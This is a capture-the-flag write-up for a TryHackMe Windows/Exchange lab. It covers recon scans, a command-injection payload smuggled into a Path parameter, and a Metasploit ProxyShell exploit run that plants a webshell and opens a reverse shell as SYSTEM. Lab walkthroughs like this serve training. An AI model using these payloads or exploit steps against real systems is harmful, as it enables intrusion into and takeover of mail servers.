TryHackMe Lookback

nmap

nmap -sV -sC -T4 -p- 10.10.69.162 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-09 15:12 EST
Nmap scan report for 10.10.69.162
Host is up (0.092s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
80/tcp   open  http          Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Site doesn't have a title.
443/tcp  open  ssl/https
| ssl-cert: Subject: commonName=WIN-12OUO7A66M7
| Subject Alternative Name: DNS:WIN-12OUO7A66M7, DNS:WIN-12OUO7A66M7.thm.local
| Not valid before: 2023-01-25T21:34:02
|_Not valid after:  2028-01-25T21:34:02
|_http-server-header: Microsoft-IIS/10.0
3389/tcp open  ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=WIN-12OUO7A66M7.thm.local
| Not valid before: 2024-02-08T19:18:53
|_Not valid after:  2024-08-09T19:18:53
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 233.18 seconds

ffuf

ffuf -u http://win-12ouo7a66m7.thm.local/FUZZ -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories-lowercase.txt -fs 0 

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://win-12ouo7a66m7.thm.local/FUZZ
 :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/Web-Content/raft-medium-directories-lowercase.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
 :: Filter           : Response size: 0
________________________________________________

test                    [Status: 403, Size: 1233, Words: 73, Lines: 30, Duration: 157ms]
ecp                     [Status: 302, Size: 233, Words: 6, Lines: 4, Duration: 73ms]
:: Progress: [26584/26584] :: Job [1/1] :: 581 req/sec :: Duration: [0:00:50] :: Errors: 2 ::

test endpoint credentials admin/admin https://win-12ouo7a66m7.thm.local/test/

Exploitation

The Path parameter is vulnerable to RCE, so the flag can be read easily

Privilege escalation

There is a TODO file on desktop. payload:

BitlockerActiveMonitoringLogs') ; type C:\Users\dev\Desktop\TODO.txt #('

containing this text "Install the Security Update for MS Exchange [TO BE DONE]" and several users including dev-infrastracture-team@thm.local

msfconsole

msf6 > search exchange Proxy  
  
Matching Modules  
================  
  
# Name Disclosure Date Rank Check Description  
- ---- --------------- ---- ----- -----------  
0 auxiliary/gather/exchange_proxylogon_collector 2021-03-02 normal No Microsoft Exchange ProxyLogon Collector  
1 exploit/windows/http/exchange_proxylogon_rce 2021-03-02 excellent Yes Microsoft Exchange ProxyLogon RCE  
2 auxiliary/scanner/http/exchange_proxylogon 2021-03-02 normal No Microsoft Exchange ProxyLogon Scanner  
3 exploit/windows/http/exchange_proxynotshell_rce 2022-09-28 excellent Yes Microsoft Exchange ProxyNotShell RCE  
4 exploit/windows/http/exchange_proxyshell_rce 2021-04-06 excellent Yes Microsoft Exchange ProxyShell RCE  
  
  
Interact with a module by name or index. For example info 4, use 4 or use exploit/windows/http/exchange_proxyshell_rce  
  
  
msf6 > use 4  
[*] Using configured payload windows/x64/meterpreter/reverse_tcp  
  
msf6 exploit(windows/http/exchange_proxyshell_rce) > set RHOST 10.10.182.96
  
msf6 exploit(windows/http/exchange_proxyshell_rce) > set LHOST 10.9.191.227  
  
msf6 exploit(windows/http/exchange_proxyshell_rce) > set EMAIL dev-infrastracture-team@thm.local  
  
EMAIL => dev-infrastracture-team@thm.local  
msf6 exploit(windows/http/exchange_proxyshell_rce) > exploit  
  
[*] Started reverse TCP handler on 10.10.182.96:4444  
[*] Running automatic check ("set AutoCheck false" to disable)  
[+] The target is vulnerable.  
[*] Attempt to exploit for CVE-2021-34473  
[*] Retrieving backend FQDN over RPC request  
[*] Internal server name: win-12ouo7a66m7.thm.local  
[*] Assigning the 'Mailbox Import Export' role via dev-infrastracture-team@thm.local  
[+] Successfully assigned the 'Mailbox Import Export' role  
[+] Proceeding with SID: S-1-5-21-2402911436-1669601961-3356949615-1144 (dev-infrastracture-team@thm.local)  
[*] Saving a draft email with subject 'EZdJFmHYi83' containing the attachment with the embedded webshell  
[*] Writing to: C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\WQk02Ek1q7zc.aspx  
[*] Waiting for the export request to complete...  
[+] The mailbox export request has completed  
[*] Triggering the payload  
[*] Sending stage (200774 bytes) to 10.10.182.96  
[+] Deleted C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\WQk02Ek1q7zc.aspx  
[*] Meterpreter session 1 opened (10.9.191.227 :4444 -> 10.10.182.96:10807) at 2024-02-09 03:44:55 +0200  
[*] Removing the mailbox export request  
[*] Removing the draft email  
  
meterpreter > shell  
Process 14256 created.  
Channel 2 created.  
Microsoft Windows [Version 10.0.17763.107]  
(c) 2018 Microsoft Corporation. All rights reserved.  
  
c:\windows\system32\inetsrv>whoami  
whoami  
nt authority\system

PreviousTryHackMe Post-Exploitation Basics NextMobileHackingLab Food Store

Last updated 1 year ago